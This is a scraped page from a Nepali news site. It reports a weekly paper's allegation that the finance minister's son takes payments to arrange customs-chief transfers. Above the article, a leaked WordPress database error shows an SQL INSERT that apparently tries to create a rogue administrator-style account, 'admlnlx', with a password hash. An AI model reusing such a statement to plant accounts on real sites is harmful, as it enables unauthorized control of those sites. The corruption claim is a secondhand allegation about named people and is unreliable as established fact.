WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCiWiXpeqQPgQnjqOFpjhbcOqBqyS5/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 23:47:38', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ६-
आजको घटना र विचार साप्ताहिकले अर्थमन्त्री कृष्णबहादुर महराका छोरा एव्म पिएले पैसा लिएर भन्सार प्रमुखको सरुवा गर्ने गरेको समाचार लेखेको छ ।प्रधानमन्त्री प्रचण्डसहितका माओवादीका तर्फबाट महत्वपूर्ण मन्त्रालयको जिम्मेवारी पाएका नेताहरुले आफ्नो सचिवालयमा आफ्नै छोरा या भाईलाई चयन गर्नुको रहस्य खुल्दै जान थालेको छ ।
अर्थमन्त्रालयको जिम्मेवारी सम्हाल्ने उपपप्रधानमन्त्री कृष्णबहादुर महराले छोरा राहुललाई आफ्नो सचिवालयमा राखेका छन् । राहुलको काम भन्सार प्रमुखमा को को लाई नियुक्ती गर्ने भन्ने विवरण तयार पारी आफ्ना पिता मन्त्रीलाई जानकारी गराउनु रहेको छ । भन्सार प्रमुखको रुपमा कार्यरत व्यक्तिले राहुलको सर्त अस्वीकार गरे काज सरुवा गरेर भएपनि देखाइदिने र नगद चढाउनेलाई भन्सार प्रमुख बनाउने गरेका छन् ।
राहुलको माग पूरा गर्न अस्वीकार गर्ने रसुवा भन्सार प्रमुख केदार पनेरुलाई सरुवा गरी निजको स्थानमा गोपाल कोइरालालाई लगिएको छ । अव विराटनगर, वीरगंज, राजश्व अनुसन्धान विभाग अन्तर्गतका विभिन्न कार्यलयका प्रमुखलाई सरुवा गर्ने तयारी भएको छ ।